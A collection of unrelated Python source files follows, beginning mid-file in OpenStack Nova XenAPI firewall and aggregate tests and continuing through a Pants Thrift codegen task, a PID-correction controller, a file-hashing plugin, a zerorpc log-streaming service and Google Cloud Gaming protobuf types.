                                                 'project_id': self.project_id,
                                                 'name': 'testsourcegroup',
                                                 'description': 'src group'})
        db.security_group_rule_create(admin_ctxt,
                                      {'parent_group_id': secgroup['id'],
                                       'protocol': 'tcp',
                                       'from_port': 80,
                                       'to_port': 81,
                                       'group_id': src_secgroup['id']})

        db.instance_add_security_group(admin_ctxt, instance_ref['uuid'],
                                       secgroup['id'])
        db.instance_add_security_group(admin_ctxt, src_instance_ref['uuid'],
                                       src_secgroup['id'])
        # Re-fetch so the instances carry their group memberships.
        instance_ref = db.instance_get(admin_ctxt, instance_ref['id'])
        src_instance_ref = db.instance_get(admin_ctxt, src_instance_ref['id'])

        network_model = fake_network.fake_get_instance_nw_info(self.stubs,
                                                      1, spectacular=True)

        fake_network.stub_out_nw_api_get_instance_nw_info(self.stubs,
                                      lambda *a, **kw: network_model)

        network_info = compute_utils.legacy_network_info(network_model)
        self.fw.prepare_instance_filter(instance_ref, network_info)
        self.fw.apply_instance_filter(instance_ref, network_info)

        self._validate_security_group()
        # Extra test for TCP acceptance rules
        for ip in network_model.fixed_ips():
            if ip['version'] != 4:
                continue
            regex = re.compile('-A .* -j ACCEPT -p tcp'
                               ' --dport 80:81 -s %s' % ip['address'])
            self.assertTrue(len(filter(regex.match, self._out_rules)) > 0,
                            "TCP port 80/81 acceptance rule wasn't added")

        db.instance_destroy(admin_ctxt, instance_ref['id'])

    def test_filters_for_instance_with_ip_v6(self):
        """With use_ipv6 enabled, an IPv6 filter rule is produced."""
        self.flags(use_ipv6=True)
        nw_info = fake_network.fake_get_instance_nw_info(self.stubs, 1)
        v4_rules, v6_rules = self.fw._filters_for_instance("fake", nw_info)
        self.assertEquals(2, len(v4_rules))
        self.assertEquals(1, len(v6_rules))

    def test_filters_for_instance_without_ip_v6(self):
        """With use_ipv6 disabled, no IPv6 filter rules are produced."""
        self.flags(use_ipv6=False)
        nw_info = fake_network.fake_get_instance_nw_info(self.stubs, 1)
        v4_rules, v6_rules = self.fw._filters_for_instance("fake", nw_info)
        self.assertEquals(2, len(v4_rules))
        self.assertEquals(0, len(v6_rules))

    def test_multinic_iptables(self):
        """Every fixed address on every network adds exactly one rule,
        for both IPv4 and IPv6."""
        rules_per_v4_addr = 1
        rules_per_v6_addr = 1
        v4_addrs_per_network = 2
        v6_addrs_per_network = 1
        network_count = 5

        instance_ref = self._create_instance_ref()
        network_info = fake_network.fake_get_instance_nw_info(
            self.stubs, network_count, v4_addrs_per_network)

        # rule counts before the instance filter is prepared
        v4_before = len(self.fw.iptables.ipv4['filter'].rules)
        v6_before = len(self.fw.iptables.ipv6['filter'].rules)
        inst_v4, inst_v6 = self.fw.instance_rules(instance_ref, network_info)
        self.fw.prepare_instance_filter(instance_ref, network_info)

        v4_after = self.fw.iptables.ipv4['filter'].rules
        v6_after = self.fw.iptables.ipv6['filter'].rules
        # network rules = total growth minus the per-instance rules
        v4_network_rules = len(v4_after) - len(inst_v4) - v4_before
        v6_network_rules = len(v6_after) - len(inst_v6) - v6_before
        self.assertEquals(
            rules_per_v4_addr * v4_addrs_per_network * network_count,
            v4_network_rules)
        self.assertEquals(
            rules_per_v6_addr * v6_addrs_per_network * network_count,
            v6_network_rules)

    def test_do_refresh_security_group_rules(self):
        """refresh_security_group_rules picks up rules added after prepare.

        A security group is attached and filtered, a new UDP rule is then
        inserted directly into the DB, and refreshing the group must emit
        the corresponding iptables rule.
        """
        admin_ctxt = context.get_admin_context()
        instance_ref = self._create_instance_ref()
        network_info = fake_network.fake_get_instance_nw_info(self.stubs, 1, 1)
        secgroup = self._create_test_security_group()
        db.instance_add_security_group(admin_ctxt, instance_ref['uuid'],
                                       secgroup['id'])
        self.fw.prepare_instance_filter(instance_ref, network_info)
        self.fw.instances[instance_ref['id']] = instance_ref
        self._validate_security_group()
        # add a rule to the security group
        db.security_group_rule_create(admin_ctxt,
                                      {'parent_group_id': secgroup['id'],
                                       'protocol': 'udp',
                                       'from_port': 200,
                                       'to_port': 299,
                                       'cidr': '192.168.99.0/24'})
        # validate the extra rule
        self.fw.refresh_security_group_rules(secgroup)
        regex = re.compile('-A .* -j ACCEPT -p udp --dport 200:299'
                           ' -s 192.168.99.0/24')
        # BUG FIX: the two implicitly-concatenated message fragments were
        # missing a separating space ("properly.The rule").
        self.assertTrue(len(filter(regex.match, self._out_rules)) > 0,
                        "Rules were not updated properly. "
                        "The rule for UDP acceptance is missing")

    def test_provider_firewall_rules(self):
        """Provider firewall rules are synced into the 'provider' chain.

        Verifies the chain starts empty, grows as provider rules are added
        and refreshed, that the per-instance chain jumps into it exactly
        once, and that destroying a DB rule shrinks the chain on refresh.
        """
        # setup basic instance data
        instance_ref = self._create_instance_ref()
        # FRAGILE: as in libvirt tests
        # peeks at how the firewall names chains
        chain_name = 'inst-%s' % instance_ref['id']

        network_info = fake_network.fake_get_instance_nw_info(self.stubs, 1, 1)
        self.fw.prepare_instance_filter(instance_ref, network_info)
        self.assertTrue('provider' in self.fw.iptables.ipv4['filter'].chains)

        def provider_rules():
            # current contents of the shared 'provider' chain
            return [rule for rule in self.fw.iptables.ipv4['filter'].rules
                         if rule.chain == 'provider']

        self.assertEqual(0, len(provider_rules()))

        admin_ctxt = context.get_admin_context()
        # add a rule and send the update message, check for 1 rule
        # (the created row itself is not needed afterwards, so it is
        # deliberately not bound to a name)
        db.provider_fw_rule_create(admin_ctxt,
                                   {'protocol': 'tcp',
                                    'cidr': '10.99.99.99/32',
                                    'from_port': 1,
                                    'to_port': 65535})
        self.fw.refresh_provider_fw_rules()
        self.assertEqual(1, len(provider_rules()))

        # Add another, refresh, and make sure number of rules goes to two
        provider_fw1 = db.provider_fw_rule_create(admin_ctxt,
                                                  {'protocol': 'udp',
                                                   'cidr': '10.99.99.99/32',
                                                   'from_port': 1,
                                                   'to_port': 65535})
        self.fw.refresh_provider_fw_rules()
        self.assertEqual(2, len(provider_rules()))

        # create the instance filter and make sure it has a jump rule
        self.fw.prepare_instance_filter(instance_ref, network_info)
        self.fw.apply_instance_filter(instance_ref, network_info)
        inst_rules = [rule for rule in self.fw.iptables.ipv4['filter'].rules
                           if rule.chain == chain_name]
        jump_rules = [rule for rule in inst_rules if '-j' in rule.rule]
        provjump_rules = []
        # IptablesTable doesn't make rules unique internally
        for rule in jump_rules:
            if 'provider' in rule.rule and rule not in provjump_rules:
                provjump_rules.append(rule)
        self.assertEqual(1, len(provjump_rules))

        # remove a rule from the db, cast to compute to refresh rule
        db.provider_fw_rule_destroy(admin_ctxt, provider_fw1['id'])
        self.fw.refresh_provider_fw_rules()
        self.assertEqual(1, len(provider_rules()))


class XenAPISRSelectionTestCase(test.TestCase):
    """Unit tests for testing we find the right SR."""

    def setUp(self):
        super(XenAPISRSelectionTestCase, self).setUp()
        xenapi_fake.reset()

    def _stubbed_helper(self):
        """Stub out a fake XenAPI session and return (session, VMHelper)."""
        stubs.stubout_session(self.stubs, stubs.FakeSessionForVMTests)
        session = xenapi_conn.XenAPISession('test_url', 'root', 'test_pass')
        helper = vm_utils.VMHelper
        helper.XenAPI = session.get_imported_xenapi()
        return session, helper

    def test_safe_find_sr_raise_exception(self):
        """Ensure StorageRepositoryNotFound is raise when wrong filter."""
        self.flags(sr_matching_filter='yadayadayada')
        session, helper = self._stubbed_helper()
        self.assertRaises(exception.StorageRepositoryNotFound,
                          helper.safe_find_sr, session)

    def test_safe_find_sr_local_storage(self):
        """Ensure the default local-storage is found."""
        self.flags(sr_matching_filter='other-config:i18n-key=local-storage')
        session, helper = self._stubbed_helper()
        host_ref = xenapi_fake.get_all('host')[0]
        other_config = {'i18n-original-value-name_label': 'Local storage',
                        'i18n-key': 'local-storage'}
        local_sr = xenapi_fake.create_sr(name_label='Fake Storage',
                                         type='lvm',
                                         other_config=other_config,
                                         host_ref=host_ref)
        self.assertEqual(local_sr, helper.safe_find_sr(session))

    def test_safe_find_sr_by_other_criteria(self):
        """Ensure the SR is found when using a different filter."""
        self.flags(sr_matching_filter='other-config:my_fake_sr=true')
        session, helper = self._stubbed_helper()
        host_ref = xenapi_fake.get_all('host')[0]
        local_sr = xenapi_fake.create_sr(name_label='Fake Storage',
                                         type='lvm',
                                         other_config={'my_fake_sr': 'true'},
                                         host_ref=host_ref)
        self.assertEqual(local_sr, helper.safe_find_sr(session))

    def test_safe_find_sr_default(self):
        """Ensure the default SR is found regardless of other-config."""
        self.flags(sr_matching_filter='default-sr:true')
        session, helper = self._stubbed_helper()
        pool_ref = xenapi_fake.create_pool('')
        self.assertEqual(session.call_xenapi('pool.get_default_SR', pool_ref),
                         helper.safe_find_sr(session))


class XenAPIAggregateTestCase(test.TestCase):
    """Unit tests for aggregate operations."""

    def setUp(self):
        super(XenAPIAggregateTestCase, self).setUp()
        self.flags(xenapi_connection_url='http://test_url',
                   xenapi_connection_username='test_user',
                   xenapi_connection_password='test_pass',
                   instance_name_template='%d',
                   firewall_driver='nova.virt.xenapi.firewall.'
                                   'Dom0IptablesFirewallDriver',
                   host='host')
        xenapi_fake.reset()
        host_ref = xenapi_fake.get_all('host')[0]
        stubs.stubout_session(self.stubs, stubs.FakeSessionForVMTests)
        self.context = context.get_admin_context()
        self.conn = xenapi_conn.get_connection(False)
        self.fake_metadata = {'main_compute': 'host',
                              'host': xenapi_fake.get_record('host',
                                                             host_ref)['uuid']}

    def test_add_to_aggregate_called(self):
        """add_to_aggregate on the connection delegates to the pool."""
        def fake_add_to_aggregate(context, aggregate, host):
            fake_add_to_aggregate.called = True
        self.stubs.Set(self.conn._pool,
                       "add_to_aggregate",
                       fake_add_to_aggregate)

        self.conn.add_to_aggregate(None, None, None)
        self.assertTrue(fake_add_to_aggregate.called)

    def test_add_to_aggregate_for_first_host_sets_metadata(self):
        """Adding the first host initializes the pool and sets metadata."""
        def fake_init_pool(id, name):
            fake_init_pool.called = True
        self.stubs.Set(self.conn._pool, "_init_pool", fake_init_pool)

        aggregate = self._aggregate_setup()
        self.conn._pool.add_to_aggregate(self.context, aggregate, "host")
        result = db.aggregate_get(self.context, aggregate.id)
        self.assertTrue(fake_init_pool.called)
        self.assertDictMatch(self.fake_metadata, result.metadetails)
        self.assertEqual(aggregate_states.ACTIVE, result.operational_state)

    def test_join_subordinate(self):
        """Ensure join_subordinate gets called when the request gets to main."""
        def fake_join_subordinate(id, compute_uuid, host, url, user, password):
            fake_join_subordinate.called = True
        self.stubs.Set(self.conn._pool, "_join_subordinate", fake_join_subordinate)

        aggregate = self._aggregate_setup(hosts=['host', 'host2'],
                                          metadata=self.fake_metadata)
        self.conn._pool.add_to_aggregate(self.context, aggregate, "host2",
                                         compute_uuid='fake_uuid',
                                         url='fake_url',
                                         user='fake_user',
                                         passwd='fake_pass',
                                         xenhost_uuid='fake_uuid')
        self.assertTrue(fake_join_subordinate.called)

    def test_add_to_aggregate_first_host(self):
        """Adding the first host renames the XenServer pool."""
        def fake_pool_set_name_label(self, session, pool_ref, name):
            fake_pool_set_name_label.called = True
        self.stubs.Set(xenapi_fake.SessionBase, "pool_set_name_label",
                       fake_pool_set_name_label)
        self.conn._session.call_xenapi("pool.create", {"name": "asdf"})

        values = {"name": 'fake_aggregate',
                  "availability_zone": 'fake_zone'}
        result = db.aggregate_create(self.context, values)
        db.aggregate_host_add(self.context, result.id, "host")
        aggregate = db.aggregate_get(self.context, result.id)
        self.assertEqual(["host"], aggregate.hosts)
        self.assertEqual({}, aggregate.metadetails)

        self.conn._pool.add_to_aggregate(self.context, aggregate, "host")
        self.assertTrue(fake_pool_set_name_label.called)

    def test_remove_from_aggregate_called(self):
        """remove_from_aggregate on the connection delegates to the pool."""
        def fake_remove_from_aggregate(context, aggregate, host):
            fake_remove_from_aggregate.called = True
        self.stubs.Set(self.conn._pool,
                       "remove_from_aggregate",
                       fake_remove_from_aggregate)

        self.conn.remove_from_aggregate(None, None, None)
        self.assertTrue(fake_remove_from_aggregate.called)

    def test_remove_from_empty_aggregate(self):
        """Removing a host from an empty aggregate raises AggregateError."""
        values = {"name": 'fake_aggregate',
                  "availability_zone": 'fake_zone'}
        result = db.aggregate_create(self.context, values)
        self.assertRaises(exception.AggregateError,
                          self.conn._pool.remove_from_aggregate,
                          None, result, "test_host")

    def test_remove_subordinate(self):
        """Ensure eject subordinate gets called."""
        def fake_eject_subordinate(id, compute_uuid, host_uuid):
            fake_eject_subordinate.called = True
        self.stubs.Set(self.conn._pool, "_eject_subordinate", fake_eject_subordinate)

        self.fake_metadata['host2'] = 'fake_host2_uuid'
        aggregate = self._aggregate_setup(hosts=['host', 'host2'],
                                          metadata=self.fake_metadata)
        self.conn._pool.remove_from_aggregate(self.context, aggregate, "host2")
        self.assertTrue(fake_eject_subordinate.called)

    def test_remove_main_solo(self):
        """Ensure metadata are cleared after removal."""
        def fake_clear_pool(id):
            fake_clear_pool.called = True
        self.stubs.Set(self.conn._pool, "_clear_pool", fake_clear_pool)

        aggregate = self._aggregate_setup(aggr_state=aggregate_states.ACTIVE,
                                          metadata=self.fake_metadata)
        self.conn._pool.remove_from_aggregate(self.context, aggregate, "host")
        result = db.aggregate_get(self.context, aggregate.id)
        self.assertTrue(fake_clear_pool.called)
        self.assertDictMatch({}, result.metadetails)
        self.assertEqual(aggregate_states.ACTIVE, result.operational_state)

    def test_remote_main_non_empty_pool(self):
        """Ensure AggregateError is raised if removing the main."""
        aggregate = self._aggregate_setup(aggr_state=aggregate_states.ACTIVE,
                                          hosts=['host', 'host2'],
                                          metadata=self.fake_metadata)
        self.assertRaises(exception.InvalidAggregateAction,
                          self.conn._pool.remove_from_aggregate,
                          self.context, aggregate, "host")

    def _aggregate_setup(self, aggr_name='fake_aggregate',
                         aggr_zone='fake_zone',
                         aggr_state=aggregate_states.CREATED,
                         hosts=None, metadata=None):
        """Create an aggregate with the given hosts/metadata and return it.

        BUG FIX: `hosts` previously defaulted to a shared mutable list
        (['host']); use None as sentinel and build a fresh list per call.
        """
        if hosts is None:
            hosts = ['host']
        values = {"name": aggr_name,
                  "availability_zone": aggr_zone,
                  "operational_state": aggr_state, }
        result = db.aggregate_create(self.context, values)
        for host in hosts:
            db.aggregate_host_add(self.context, result.id, host)
        if metadata:
            db.aggregate_metadata_add(self.context, result.id, metadata)
        return db.aggregate_get(self.context, result.id)

# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).

from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
                        unicode_literals, with_statement)

import os
import re
import subprocess

from pants.backend.codegen.subsystems.thrift_defaults import ThriftDefaults
from pants.base.build_environment import get_buildroot
from pants.base.exceptions import TaskError
from pants.base.workunit import WorkUnitLabel
from pants.binaries.thrift_binary import ThriftBinary
from pants.task.simple_codegen_task import SimpleCodegenTask
from pants.util.dirutil import safe_mkdir
from pants.util.memo import memoized_property
from twitter.common.collections import OrderedSet

from pants.contrib.go.targets.go_thrift_library import GoThriftGenLibrary, GoThriftLibrary


class GoThriftGen(SimpleCodegenTask):
  """Generate Go source from go_thrift_library targets via the Apache
  Thrift compiler."""

  @classmethod
  def register_options(cls, register):
    super(GoThriftGen, cls).register_options(register)

    register('--strict', default=True, fingerprint=True, type=bool,
             help='Run thrift compiler with strict warnings.')
    register('--gen-options', advanced=True, fingerprint=True,
             help='Use these apache thrift go gen options.')
    register('--thrift-import', advanced=True,
             help='Use this thrift-import gen option to thrift.')
    register('--thrift-import-target', advanced=True,
             help='Use this thrift import on symbolic defs.')

  @classmethod
  def subsystem_dependencies(cls):
    return (super(GoThriftGen, cls).subsystem_dependencies() +
            (ThriftDefaults, ThriftBinary.Factory.scoped(cls)))

  @memoized_property
  def _thrift_binary(self):
    # Path to the resolved thrift compiler executable.
    thrift_binary = ThriftBinary.Factory.scoped_instance(self).create()
    return thrift_binary.path

  @memoized_property
  def _deps(self):
    # Targets every generated library depends on (the Go thrift runtime).
    thrift_import_target = self.get_options().thrift_import_target
    thrift_imports = self.context.resolve(thrift_import_target)
    return thrift_imports

  @memoized_property
  def _service_deps(self):
    # Extra dependencies for thrift files declaring services; falls back to
    # the plain runtime deps when no 'service_deps' option is configured.
    service_deps = self.get_options().get('service_deps')
    return list(self.resolve_deps(service_deps)) if service_deps else self._deps

  SERVICE_PARSER = re.compile(r'^\s*service\s+(?:[^\s{]+)')
  NAMESPACE_PARSER = re.compile(r'^\s*namespace go\s+([^\s]+)', re.MULTILINE)

  def _declares_service(self, source):
    """Return True if the thrift file at `source` declares a service."""
    with open(source) as thrift:
      return any(line for line in thrift if self.SERVICE_PARSER.search(line))

  def _get_go_namespace(self, source):
    """Return the `namespace go` value declared in `source`.

    :raises TaskError: if the file declares no go namespace.
    """
    with open(source) as thrift:
      namespace = self.NAMESPACE_PARSER.search(thrift.read())
      if not namespace:
        # BUG FIX: the message was passed as a format string plus a separate
        # arg, but TaskError does not interpolate — format explicitly.
        raise TaskError('Thrift file {} must contain "namespace go "'
                        .format(source))
      return namespace.group(1)

  def synthetic_target_extra_dependencies(self, target, target_workdir):
    # Service-declaring thrift files need the heavier service deps.
    for source in target.sources_relative_to_buildroot():
      if self._declares_service(os.path.join(get_buildroot(), source)):
        return self._service_deps
    return self._deps

  def synthetic_target_type(self, target):
    return GoThriftGenLibrary

  def is_gentarget(self, target):
    return isinstance(target, GoThriftLibrary)

  @memoized_property
  def _thrift_cmd(self):
    # Base command line shared by all targets; per-target args are appended
    # in _generate_thrift.
    cmd = [self._thrift_binary]
    thrift_import = 'thrift_import={}'.format(self.get_options().thrift_import)
    gen_options = self.get_options().gen_options
    if gen_options:
      gen_options += ',' + thrift_import
    else:
      gen_options = thrift_import
    cmd.extend(('--gen', 'go:{}'.format(gen_options)))

    if self.get_options().strict:
      cmd.append('-strict')
    if self.get_options().level == 'debug':
      cmd.append('-verbose')
    return cmd

  def _generate_thrift(self, target, target_workdir):
    """Run the thrift compiler for `target`, leaving Go sources in src/go."""
    target_cmd = self._thrift_cmd[:]

    bases = OrderedSet(tgt.target_base for tgt in target.closure() if self.is_gentarget(tgt))
    for base in bases:
      target_cmd.extend(('-I', base))

    target_cmd.extend(('-o', target_workdir))

    all_sources = list(target.sources_relative_to_buildroot())
    if len(all_sources) != 1:
      # BUG FIX: format the message explicitly (TaskError does not
      # interpolate positional args).
      raise TaskError('go_thrift_library only supports a single .thrift source file for {}.'
                      .format(target))

    source = all_sources[0]
    target_cmd.append(os.path.join(get_buildroot(), source))
    with self.context.new_workunit(name=source,
                                   labels=[WorkUnitLabel.TOOL],
                                   cmd=' '.join(target_cmd)) as workunit:
      result = subprocess.call(target_cmd,
                               stdout=workunit.output('stdout'),
                               stderr=workunit.output('stderr'))
      if result != 0:
        raise TaskError('{} ... exited non-zero ({})'.format(self._thrift_binary, result))

    # The Apache compiler writes into gen-go/; relocate to src/go so the
    # output matches the Go source layout expected downstream.
    gen_dir = os.path.join(target_workdir, 'gen-go')
    src_dir = os.path.join(target_workdir, 'src')
    safe_mkdir(src_dir)
    go_dir = os.path.join(target_workdir, 'src', 'go')
    os.rename(gen_dir, go_dir)

  @classmethod
  def product_types(cls):
    return ['go']

  def execute_codegen(self, target, target_workdir):
    self._generate_thrift(target, target_workdir)

  @property
  def _copy_target_attributes(self):
    """Override `_copy_target_attributes` to exclude `provides`."""
    return [a for a in super(GoThriftGen, self)._copy_target_attributes if a != 'provides']

  def synthetic_target_dir(self, target, target_workdir):
    """Return the dir holding generated sources for `target`, derived from
    the thrift file's declared go namespace."""
    all_sources = list(target.sources_relative_to_buildroot())
    source = all_sources[0]
    namespace = self._get_go_namespace(source)
    return os.path.join(target_workdir, 'src', 'go', namespace.replace(".", os.path.sep))

import unittest, re
from rexp.compiler import PatternCompiler


class CompilerTestMethods(unittest.TestCase):
    def test_compile_1(self):
        compiler = PatternCompiler(pattern_set=dict(
            TEST=r'\w+'
        ))

        try:
            c1 = compiler.compile('$1{TEST}')
        except Exception as exc:
            self.assertTrue(1)

        c1 = compiler.compile('$1{TEST}', ['test'])
        self.assertEqual(c1, r'(?:(?P<test>(\w+)))')

    def test_compile_2(self):
        compiler = PatternCompiler(pattern_set=dict(
            TEST=r'\w+'
        ))

        try:
            c1 = compiler.compile('$1{TEST}')
        except:
            self.assertTrue(1)

        c1 = compiler.compile('$1{TEST}', ['test'])
        self.assertEqual(c1, r'(?:(?P<test>(\w+)))')

import torch

from deluca.lung.core import Controller, LungEnv


class PIDCorrection(Controller):
    """Wraps a base controller and adds a PID-style pressure correction.

    The correction is driven by the error between a simulator's predicted
    pressure and the observed state, with an exponentially-decayed
    integral term.
    """

    def __init__(self, base_controller: Controller, sim: LungEnv, pid_K=None, decay=0.1, **kwargs):
        # BUG FIX: pid_K previously defaulted to a shared mutable list
        # ([0.0, 0.0]); use None as sentinel and build a fresh list.
        self.base_controller = base_controller
        self.sim = sim
        self.I = 0.0  # decayed integral of the pressure error
        self.K = [0.0, 0.0] if pid_K is None else pid_K  # [Kp, Ki]
        self.decay = decay

        self.reset()

    def reset(self):
        """Reset the wrapped controller, the simulator and the integral term."""
        self.base_controller.reset()
        self.sim.reset()
        self.I = 0.0

    def compute_action(self, state, t):
        """Return (u_in, u_out) at time t with a PID-corrected inspiratory value."""
        u_in_base, u_out = self.base_controller(state, t)

        # error between simulated pressure and the observed state
        # (assumes `state` is the measured pressure — TODO confirm)
        err = self.sim.pressure - state
        # exponential-decay running integral of the error
        self.I = self.I * (1 - self.decay) + err * self.decay

        pid_correction = self.K[0] * err + self.K[1] * self.I

        # clamp the corrected command into the valid [0, 100] range
        u_in = torch.clamp(u_in_base + pid_correction, min=0.0, max=100.0)
        # advance the simulator with the action actually taken
        self.sim(u_in, u_out, t)

        return u_in, u_out

# -*- coding: UTF-8 -*-
from __future__ import unicode_literals, print_function, division

# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.


def strip_region_tags(sample_text):
    """Return sample_text with blank lines and region-tag lines removed.

    A region-tag line is any line containing the marker "# [".
    """
    kept = []
    for line in sample_text.split("\n"):
        if line and "# [" not in line:
            kept.append(line)
    return "\n".join(kept)

import hashlib

from core.analytics import InlineAnalytics
from core.observables import Hash

HASH_TYPES_DICT = {
    "md5": hashlib.md5,
    "sha1": hashlib.sha1,
    "sha256": hashlib.sha256,
    "sha512": hashlib.sha512,
}


class HashFile(InlineAnalytics):
    """Computes MD5/SHA1/SHA256/SHA512 digests of observable file bodies
    and links the resulting Hash observables back to the file."""

    default_values = {
        "name": "HashFile",
        "description": "Extracts MD5, SHA1, SHA256, SHA512 hashes from file",
    }

    ACTS_ON = ["File", "Certificate"]

    @staticmethod
    def each(f):
        """Hash the body of `f` (if any) and record/link each digest."""
        if not f.body:
            return
        f.hashes = []
        for hash_type, hasher in HashFile.extract_hashes(f.body.contents):
            digest = hasher.hexdigest()
            hash_object = Hash.get_or_create(value=digest)
            hash_object.add_source("analytics")
            hash_object.save()
            f.active_link_to(
                hash_object,
                "{} hash".format(hash_type.upper()),
                "HashFile",
                clean_old=False,
            )
            f.hashes.append({"hash": hash_type, "value": digest})
        f.save()

    @staticmethod
    def extract_hashes(body_contents):
        """Stream `body_contents` through every configured hasher and
        return (name, hasher) pairs."""
        hashers = {name: factory() for name, factory in HASH_TYPES_DICT.items()}

        chunk = body_contents.read(512 * 16)
        while chunk:
            for hasher in hashers.values():
                hasher.update(chunk)
            chunk = body_contents.read(512 * 16)

        return hashers.items()

import zerorpc
import gevent.queue
import logging
import sys

logging.basicConfig()

# root logger
logger = logging.getLogger()

# set the minimum level for the root logger so it will be possible for a
# client to subscribe and receive logs for any log level
logger.setLevel(0)


class QueueingLogHandler(logging.Handler):
    """Logging handler that forwards every formatted record into a queue
    (anything exposing put_nowait, e.g. a gevent queue)."""

    def __init__(self, queue, level, formatter):
        super(QueueingLogHandler, self).__init__()
        self._queue = queue
        self.setLevel(level)
        self.setFormatter(formatter)

    def emit(self, record):
        """Format the record and enqueue it without blocking."""
        self._queue.put_nowait(self.format(record))

    def close(self):
        """Close the handler and push a None sentinel to wake consumers."""
        super(QueueingLogHandler, self).close()
        self._queue.put_nowait(None)

    @property
    def emitted(self):
        """The queue of formatted messages; None marks closure."""
        return self._queue


class TestService(object):
    """zerorpc service that exposes live log subscription as a stream."""

    _HANDLER_CLASS = QueueingLogHandler
    _DEFAULT_FORMAT = '%(name)s - %(levelname)s - %(asctime)s - %(message)s'

    logger = logging.getLogger("service")

    def __init__(self):
        # handlers currently attached for active subscriptions
        self._logging_handlers = set()

    def test(self, logger_name, logger_level, message):
        """Emit `message` on the named logger at the given level."""
        logger = logging.getLogger(logger_name)
        getattr(logger, logger_level.lower())(message)

    def available_loggers(self):
        """ List of initialized loggers """
        return logging.getLogger().manager.loggerDict.keys()

    def close_log_streams(self):
        """ Closes all log_stream streams. """
        while self._logging_handlers:
            self._logging_handlers.pop().close()

    @zerorpc.stream
    def log_stream(self, logger_name, level_name, format_str):
        """ Attaches a log handler to the specified logger and sends emitted logs 
            back as stream. 

        Raises ValueError for an unknown logger and AttributeError for an
        unknown level name.
        """
        if logger_name != "" and logger_name not in self.available_loggers():
            raise ValueError("logger {0} is not available".format(logger_name))

        level_name_upper = level_name.upper() if level_name else "NOTSET"
        try:
            level = getattr(logging, level_name_upper)
        except AttributeError:
            # BUG FIX: was `except AttributeError, e` (Python 2-only syntax,
            # and `e` was unused); `except X:` works on Python 2 and 3.
            raise AttributeError("log level {0} is not available".format(level_name_upper))

        q = gevent.queue.Queue()
        fmt = format_str if format_str.strip() else self._DEFAULT_FORMAT

        logger = logging.getLogger(logger_name)
        formatter = logging.Formatter(fmt)
        handler = self._HANDLER_CLASS(q, level, formatter)

        logger.addHandler(handler)
        self._logging_handlers.add(handler)

        self.logger.debug("new subscriber for {0}/{1}".format(logger_name or "root", level_name_upper))
        try:
            # stream formatted messages until the handler is closed
            # (a None sentinel marks closure)
            for msg in handler.emitted:
                if msg is None:
                    return
                yield msg
        finally:
            self._logging_handlers.discard(handler)
            handler.close()
            self.logger.debug("subscription finished for {0}/{1}".format(logger_name or "root", level_name_upper))
    
if __name__ == "__main__":
    # usage: python <script> <bind-endpoint>, e.g. tcp://0.0.0.0:4242
    service = TestService()
    server = zerorpc.Server(service)
    server.bind(sys.argv[1])
    logger.warning("starting service")
    try:
        server.run()
    except BaseException as e:
        # BUG FIX: was `except BaseException, e` (Python 2-only syntax);
        # `except ... as ...` works on Python 2.6+ and 3.
        logger.error(str(e))
    finally:
        logger.warning("shutting down")



# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto  # type: ignore

from google.protobuf import duration_pb2  # type: ignore
from google.protobuf import timestamp_pb2  # type: ignore


# Registry of every message type this module defines; proto-plus uses it to
# wire the generated classes into the google.cloud.gaming.v1 package.
__protobuf__ = proto.module(
    package="google.cloud.gaming.v1",
    manifest={
        "OperationMetadata",
        "OperationStatus",
        "LabelSelector",
        "RealmSelector",
        "Schedule",
        "SpecSource",
        "TargetDetails",
        "TargetState",
        "DeployedFleetDetails",
    },
)


class OperationMetadata(proto.Message):
    r"""Metadata describing a long-running Game Services operation.

    Attributes:
        create_time (google.protobuf.timestamp_pb2.Timestamp):
            Output only. The time the operation was created.
        end_time (google.protobuf.timestamp_pb2.Timestamp):
            Output only. The time the operation finished running.
        target (str):
            Output only. Server-defined resource path for the target of
            the operation.
        verb (str):
            Output only. Name of the verb executed by the operation.
        status_message (str):
            Output only. Human-readable status of the operation, if any.
        requested_cancellation (bool):
            Output only. Whether the user has requested cancellation of
            the operation. Successfully cancelled operations carry an
            [Operation.error][] with a
            [google.rpc.Status.code][google.rpc.Status.code] of 1,
            corresponding to ``Code.CANCELLED``.
        api_version (str):
            Output only. API version used to start the operation.
        unreachable (Sequence[str]):
            Output only. List of Locations that could not be reached.
        operation_status (Sequence[google.cloud.gaming_v1.types.OperationMetadata.OperationStatusEntry]):
            Output only. Per-resource operation status for Game Services
            API operations, keyed by resource ID; on failure the value
            includes an error code and message.
    """

    create_time = proto.Field(
        proto.MESSAGE,
        number=1,
        message=timestamp_pb2.Timestamp,
    )
    end_time = proto.Field(
        proto.MESSAGE,
        number=2,
        message=timestamp_pb2.Timestamp,
    )
    target = proto.Field(proto.STRING, number=3)
    verb = proto.Field(proto.STRING, number=4)
    status_message = proto.Field(proto.STRING, number=5)
    requested_cancellation = proto.Field(proto.BOOL, number=6)
    api_version = proto.Field(proto.STRING, number=7)
    unreachable = proto.RepeatedField(proto.STRING, number=8)
    operation_status = proto.MapField(
        proto.STRING,
        proto.MESSAGE,
        number=9,
        message="OperationStatus",
    )


class OperationStatus(proto.Message):
    r"""Status of a long-running Game Services API operation.

    Attributes:
        done (bool):
            Output only. Whether the operation is done or
            still in progress.
        error_code (google.cloud.gaming_v1.types.OperationStatus.ErrorCode):
            The error code in case of failures.
        error_message (str):
            The human-readable error message.
    """

    class ErrorCode(proto.Enum):
        r"""Error codes reported for failed operations."""
        ERROR_CODE_UNSPECIFIED = 0
        INTERNAL_ERROR = 1
        PERMISSION_DENIED = 2
        CLUSTER_CONNECTION = 3

